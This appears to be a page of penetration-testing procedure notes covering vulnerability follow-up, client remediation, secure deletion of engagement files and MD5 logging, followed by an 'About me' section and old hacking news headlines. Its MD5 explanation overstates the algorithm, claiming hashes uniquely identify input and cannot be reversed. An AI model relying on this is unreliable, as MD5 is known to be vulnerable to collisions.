Several of the programs recommended in The Purple Files will identify known vulnerabilities. Rather than try to maintain a db of all known exploits, you should research each red flag any program identifies to get the latest information about it and its remediation.
Be sure that you include the severity metrics for each issue identified or observed. These typically be found at NVD (National Vulnerability Database).
Work with the client through secure email and or on-site on questions, suggestions, explanations and so on in order to help facilitate the client to understand and remediate the issues that were identified.
After a period of time for remediation, recheck the issues that were identified to verify they have been effectively addressed.
Keep management informed during these steps.
All relevant files created during an engagement are to be moved into the Pentesting directory on the R&C network drive. (Consider encrypting them)
All files created during an engagement that are located on the operator's system should be destructively removed.
Ben, lots of info and examples of srm and sfill.
If a session was created in Metasploit, it should be deleted.
MD5 stands for Message Digest version 5. This is a common hashing algorithm. A hash is a single numeric value that is calculated from the digital input material (a string, a file, a disk...) which can be of any type or size. The resulting hash value uniquely identifies that input material exactly and can be used to verify that the material has not been changed since the hash value was calculated. A hash value also cannot be reversed in anyway to produce the original input material.
Generate an md5 log for all files in the workspace directory. Make sure to have changed to the workspace directory using the cd command before running the following:
About me...
Hackers prompt Kentucky shakeup - By Wilson P. Dizard III Aug 13, 2003
Kentucky shakes up systems after large-scale hacking - By Wilson P. Dizard III Jul 30, 2003
Hackers attack Kentucky
- Jul 31, 2003
Discarded Computer Had Confidential Medical Information - February 6, 2003 at 8:30 PM EST - Updated June 18 at 12:46 PM